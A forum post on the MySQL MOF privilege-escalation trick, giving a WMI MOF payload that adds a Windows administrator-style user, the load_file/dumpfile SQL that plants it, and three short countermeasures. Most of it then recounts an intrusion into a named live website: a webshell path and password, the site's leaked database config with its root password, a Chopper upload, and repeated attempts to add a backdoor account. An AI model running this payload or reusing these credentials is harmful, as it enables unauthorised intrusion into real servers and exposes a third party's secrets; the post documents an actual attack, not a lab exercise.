MySQL MOF extension vulnerability: prevention methods
Some exploit code published online:
#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter {
    EventNamespace = "Root\\Cimv2";
    Name = "filtP2";
    Query = "Select * From __InstanceModificationEvent " "Where TargetInstance Isa \"Win32_LocalTime\" " "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer {
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
};

instance of __FilterToConsumerBinding {
    Consumer = $Consumer;
    Filter = $EventFilter;
};
After connecting to the MySQL database, run:

select load_file('C:\\RECYCLER\\nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
From the code above, the countermeasures follow:

1. MySQL user privilege control: disallow functions such as "load_file" and "dumpfile".

2. Disable the "WScript.Shell" component.

3. Directory permissions on c:/windows/system32/wbem/mof/: remove the built-in special group CREATOR OWNER.
Of course, the above is what people say online. It feels like the privileges required are quite high, e.g. root, plus MySQL remote access. I ran into one yesterday, so let me demonstrate it for everyone.

Here's how it happened: a buddy asked a question on the forum, I took a look and found that an expert had already compromised it, saying it was done with MySQL MOF extension privilege escalation.

But this newbie had never heard of it, so I hurried off to look up material and learn... hence the content above, taken from the web.

Once I understood it, time to practice.

http://www.webbmw.com/config/config_ucenter.php one-liner (webshell), password a
$_config['db']['1']['dbhost'] = 'localhost';
$_config['db']['1']['dbuser'] = 'root';
$_config['db']['1']['dbpw'] = 'tfr226206';
$_config['db']['1']['dbcharset'] = 'gbk';
$_config['db']['1']['pconnect'] = '0';
$_config['db']['1']['dbname'] = 'webbmw';
$_config['db']['1']['tablepre'] = 'pre_';
$_config['db']['common']['slave_except_table'] = '';

There's the root password.
So I went straight in with 菜刀 (Chopper).

Upload the shell first.

Since we have those accounts and such, let's go ahead and execute it......

A small note:

Here the first execution did not succeed; the reason is unknown.

I guessed that maybe the code we executed had a problem, so I went to WooYun and found this code:
#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter {
    EventNamespace = "Root\\Cimv2";
    Name = "filtP2";
    Query = "Select * From __InstanceModificationEvent " "Where TargetInstance Isa \"Win32_LocalTime\" " "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer {
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user test test /add\")";
};

instance of __FilterToConsumerBinding {
    Consumer = $Consumer;
    Filter = $EventFilter;
};
I put the file at C:\WINDOWS\temp\1.mof

So we modify the code we execute accordingly:
select load_file('C:\WINDOWS\temp\1.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
But you'll find the account still isn't there..

So I was pretty frustrated.

I went and ran it against the databases one by one, and when I got to the second one, mysql, it succeeded.........

But none of the other databases worked...

I'm really puzzled. Why exactly does it fail? Asking the experts to explain...